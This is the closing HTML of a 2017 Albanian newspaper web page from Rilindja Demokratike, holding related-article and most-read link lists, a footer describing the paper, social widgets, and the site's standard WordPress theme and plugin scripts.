            </div></div>                        <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://www.rd.al/author/gazetard/">Gazeta RD</a></span></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Gazeta RD"></span><meta itemprop="datePublished" content="2017-08-04T19:33:45+00:00"><meta itemprop="dateModified" content="2017-08-04T19:33:45+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://www.rd.al/2017/08/reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.rd.al/wp-content/uploads/2016/03/RD-Logo-web-4.png"></span><meta itemprop="name" content="Rilindja Demokratike"></span><meta itemprop="headline " content="Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.rd.al/wp-content/uploads/2017/08/gjenerali-pakistanez.jpg"><meta itemprop="width" content="1023"><meta itemprop="height" content="575"></span>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_6_5984b16943387 = new tdBlock();
block_td_uid_6_5984b16943387.id = "td_uid_6_5984b16943387";
block_td_uid_6_5984b16943387.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_uid_6_5984b16943387_rand","td_column_number":3,"live_filter_cur_post_id":47960,"live_filter_cur_post_author":"3"}';
block_td_uid_6_5984b16943387.td_column_number = "3";
block_td_uid_6_5984b16943387.block_type = "td_block_related_posts";
block_td_uid_6_5984b16943387.post_count = "3";
block_td_uid_6_5984b16943387.found_posts = "2331";
block_td_uid_6_5984b16943387.header_color = "";
block_td_uid_6_5984b16943387.ajax_pagination_infinite_stop = "";
block_td_uid_6_5984b16943387.max_num_pages = "777";
tdBlocksArray.push(block_td_uid_6_5984b16943387);
</script><div class="td_block_wrap td_block_related_posts td_uid_6_5984b16943387_rand td_with_ajax_pagination td-pb-border-top"><h4 class="td-related-title"><a id="td_uid_7_5984b1694647e" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_6_5984b16943387" href="#">Të tjera</a></h4><div id=td_uid_6_5984b16943387 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/konfirmohet-vrasja-e-lavdrim-muhaxherit-ne-muajin-qershor/" rel="bookmark" title="Konfirmohet vrasja e Lavdrim Muhaxherit në muajin qershor"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/muhaxheriiiii-218x150.jpg" alt="" title="Konfirmohet vrasja e Lavdrim Muhaxherit në muajin qershor"/></a></div>                <a href="http://www.rd.al/category/botarajoni/" class="td-post-category">Bota &amp; Rajoni</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/konfirmohet-vrasja-e-lavdrim-muhaxherit-ne-muajin-qershor/" rel="bookmark" title="Konfirmohet vrasja e Lavdrim Muhaxherit në muajin qershor">Konfirmohet vrasja e Lavdrim Muhaxherit në muajin qershor</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/trump-fajeson-kongresin-per-mosken/" rel="bookmark" title="Trump fajëson Kongresin për Moskën"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/donald-pence-kongresi-218x150.jpg" alt="" title="Trump fajëson Kongresin për Moskën"/></a></div>                <a href="http://www.rd.al/category/botarajoni/" class="td-post-category">Bota &amp; Rajoni</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/trump-fajeson-kongresin-per-mosken/" rel="bookmark" title="Trump fajëson Kongresin për Moskën">Trump fajëson Kongresin për Moskën</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/dalin-ne-treg-edhe-bisedat-e-trump-udheheqesit-e-meksikes-e-australise/" rel="bookmark" title="Dalin në treg edhe bisedat e Trump me udhëheqësit e Meksikës e Australisë"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/doni-bisedat-218x150.jpg" alt="" title="Dalin në treg edhe bisedat e Trump me udhëheqësit e Meksikës e Australisë"/></a></div>                <a href="http://www.rd.al/category/botarajoni/" class="td-post-category">Bota &amp; Rajoni</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/dalin-ne-treg-edhe-bisedat-e-trump-udheheqesit-e-meksikes-e-australise/" rel="bookmark" title="Dalin në treg edhe bisedat e Trump me udhëheqësit e Meksikës e Australisë">Dalin në treg edhe bisedat e Trump me udhëheqësit e Meksikës e Australisë</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_6_5984b16943387" data-td_block_id="td_uid_6_5984b16943387"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_6_5984b16943387" data-td_block_id="td_uid_6_5984b16943387"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td_block_wrap td_block_social_counter td_block_widget td_uid_8_5984b1694707e_rand td-pb-border-top"><div class="td_social_type td-pb-margin-side td_social_facebook"><div class="td-sp td-sp-facebook"></div><span class="td_social_info">19,150</span><span class="td_social_info td_social_info_name">Fans</span><span class="td_social_button"><a href="https://www.facebook.com/gazetard">Like</a></span></div><div class="td_social_type td-pb-margin-side td_social_twitter"><div class="td-sp td-sp-twitter"></div><span class="td_social_info">618</span><span class="td_social_info td_social_info_name">Followers</span><span class="td_social_button"><a href="https://twitter.com/RDgazeta">Follow</a></span></div><div class="td_social_type td-pb-margin-side td_social_youtube"><div class="td-sp td-sp-youtube"></div><span class="td_social_info">112</span><span class="td_social_info td_social_info_name">Subscribers</span><span class="td_social_button"><a href="http://www.youtube.com/Shpirtidemokrat">Subscribe</a></span></div></div> <!-- ./block --><aside class="widget widget_ultimate_posts"><div class="block-title"><span>Faqja e parë </span></div>

<div class="upw-posts hfeed">

  
      
        
        <article class="post-47926 post type-post status-publish format-standard has-post-thumbnail hentry category-faqja-e-pare">

          <header>

                          <div class="entry-image">
                <a href="http://www.rd.al/2017/08/faqja-e-pare-454/" rel="bookmark">
                  <img width="1000" height="1344" src="http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1.jpg 1000w, http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1-223x300.jpg 223w, http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1-768x1032.jpg 768w, http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1-762x1024.jpg 762w, http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1-696x935.jpg 696w, http://www.rd.al/wp-content/uploads/2017/08/Faqja-e-pare-1-313x420.jpg 313w" sizes="(max-width: 1000px) 100vw, 1000px" />                </a>
              </div>
            
            
            
          </header>

          
          <footer>

            
            
            
          </footer>

        </article>

      
  
</div>

</aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Footer -->
<div class="td-footer-wrapper td-footer-template-3">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <div class="td-footer-info"><div class="footer-logo-wrap"><a href="http://www.rd.al/"><img class="td-retina-data" src="http://www.rd.al/wp-content/uploads/2016/03/RD-footer-blu-black.png" data-retina="http://www.rd.al/wp-content/uploads/2016/03/RD-footer-blu-black.png" alt="" title=""/></a></div><div class="footer-text-wrap"><p style="text-align: justify;">Rilindja Demokratike është gazeta e parë e lirë e botuar në Shqipëri nga Partia Demokratike. Numri i saj i parë doli në 5 janar 1991. Me kritikat kundër regjimit komunist, RD hapi rrugën drejt lirisë së shprehjes, lirisë së shtypit, lirisë së mendimit dhe lirisë së fjalës në Shqipëri. RD mban ende rekordin e tirazhit më të lartë të mediave të shkruara prej 125.000 kopje në ditë. Rilindja Demokratike është edhe sot një tribunë e fjalës së lirë, e të vërtetës, e denoncimit dhe e guximit.</p>
</div><div class="footer-social-wrap td-social-style-2"></div></div>            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_9_5984b16953c26 = new tdBlock();
block_td_uid_9_5984b16953c26.id = "td_uid_9_5984b16953c26";
block_td_uid_9_5984b16953c26.atts = '{"sort":"popular","custom_title":"M\u00eb t\u00eb lexuarat","limit":"3","header_color":"#","ajax_pagination":"load_more","custom_url":"","header_text_color":"#","post_ids":"","category_id":"","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","offset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_9_5984b16953c26_rand"}';
block_td_uid_9_5984b16953c26.td_column_number = "1";
block_td_uid_9_5984b16953c26.block_type = "td_block_7";
block_td_uid_9_5984b16953c26.post_count = "3";
block_td_uid_9_5984b16953c26.found_posts = "17317";
block_td_uid_9_5984b16953c26.header_color = "#";
block_td_uid_9_5984b16953c26.ajax_pagination_infinite_stop = "";
block_td_uid_9_5984b16953c26.max_num_pages = "5773";
tdBlocksArray.push(block_td_uid_9_5984b16953c26);
</script><div class="td_block_wrap td_block_7 td_block_widget td_uid_9_5984b16953c26_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>Më të lexuarat</span></h4><div id=td_uid_9_5984b16953c26 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.rd.al/2016/04/skandali-rama-me-33-zyrtare-ne-panama-papers/" rel="bookmark" title="Skandali, Rama me 33 zyrtarë në “Panama papers”"><img width="100" height="70" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/04/rama-ahmetaj111-100x70.jpg" alt="" title="Skandali, Rama me 33 zyrtarë në “Panama papers”"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2016/04/skandali-rama-me-33-zyrtare-ne-panama-papers/" rel="bookmark" title="Skandali, Rama me 33 zyrtarë në “Panama papers”">Skandali, Rama me 33 zyrtarë në “Panama papers”</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-04-05T23:54:06+00:00" >05/04/2016</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.rd.al/2016/04/berisha-gjutet-e-zhdepen-ne-dru-saje-qorrin-e-shtrine-perdhe/" rel="bookmark" title="Tritoli tek farmacia u vendos nga vetë Tahiri?"><img width="100" height="70" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/04/tahrii-gjuta-100x70.jpg" alt="" title="Tritoli tek farmacia u vendos nga vetë Tahiri?"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2016/04/berisha-gjutet-e-zhdepen-ne-dru-saje-qorrin-e-shtrine-perdhe/" rel="bookmark" title="Tritoli tek farmacia u vendos nga vetë Tahiri?">Tritoli tek farmacia u vendos nga vetë Tahiri?</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-04-13T20:24:49+00:00" >13/04/2016</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.rd.al/2016/03/cnn-shqiperia-e-zhytur-ne-korrupsion/" rel="bookmark" title="CNN: Shqipëria e zhytur në korrupsion"><img width="100" height="70" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/03/CNN-gazetarja-100x70.jpg" alt="" title="CNN: Shqipëria e zhytur në korrupsion"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2016/03/cnn-shqiperia-e-zhytur-ne-korrupsion/" rel="bookmark" title="CNN: Shqipëria e zhytur në korrupsion">CNN: Shqipëria e zhytur në korrupsion</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-03-31T20:58:43+00:00" >31/03/2016</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" id="next-page-td_uid_9_5984b16953c26" data-td_block_id="td_uid_9_5984b16953c26">Më shumë<i class="td-icon-font td-icon-menu-down"></i></a></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <aside class="widget widget_FacebookLikeBox"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like-box href="https://www.facebook.com/GazetaRD/" width="300" show_faces="true" border_color="AAAAAA" stream="false" header="true"></fb:like-box>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like layout="standard" show_faces="yes" width="350" action="like" font="arial" colorscheme="dark"></fb:like></aside>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                                        </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy;  2017  Partia Demokratike                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv 2015
        Version: 6.6.5 (rara)
        Deploy mode: deploy
        
        uid: 5984b1696dfba
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td_category_template_1 .td-category-pulldown-filter {
    display: none;
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 1141px) {
.td-all-devices img {
   /* margin-left:387px;*/
   
    margin-right: 10px;
    display: block;
}
.td-header-style-1 .td-header-sp-logo img {
    max-height: 95px;
}
.td-header-sp-recs {
    padding: 0 !important;
    width: 600px;
    position: relative;
    min-height: 0 !important;
}
.td-header-style-1 .td-header-sp-logo {
  width: 401px;
  position: relative;
  height: 90px;
  margin: 28px 28px 9px 28px;}
  .td-trending-now-wrapper {
    height: 30px;
}

}
</style>

<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js?ver=1.7.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var iphormL10n = {"error_submitting_form":"An error occurred submitting the form","swfupload_flash_url":"http:\/\/www.rd.al\/wp-includes\/js\/swfupload\/swfupload.swf","swfupload_upload_url":"http:\/\/www.rd.al\/?iphorm_swfupload=1","swfupload_too_many":"You have attempted to queue too many files","swfupload_file_too_big":"This file exceeds the maximum upload size","swfupload_file_empty":"This file is empty","swfupload_file_type_not_allowed":"This file type is not allowed","swfupload_unknown_queue_error":"Unknown queue error, please try again later","swfupload_upload_error":"Upload error","swfupload_upload_failed":"Upload failed","swfupload_server_io":"Server IO error","swfupload_security_error":"Security error","swfupload_limit_exceeded":"Upload limit exceeded","swfupload_validation_failed":"Validation failed","swfupload_upload_stopped":"Upload stopped","swfupload_unknown_upload_error":"Unknown upload error","plugin_url":"http:\/\/www.rd.al\/wp-content\/plugins\/iphorm-form-builder","ajax_url":"http:\/\/www.rd.al\/wp-admin\/admin-ajax.php","preview_no_submit":"The form cannot be submitted in the preview"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js?ver=1.7.5'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js?ver=3.5.1'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js?ver=1.4.9'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js?ver=2.2.1'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js?ver=0.1'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.6.5'></script>
<script type='text/javascript' src='http://www.rd.al/wp-includes/js/comment-reply.min.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://www.rd.al/wp-includes/js/wp-embed.min.js?ver=4.7.5'></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.rd.al/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.rd.al/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


</body>
</html>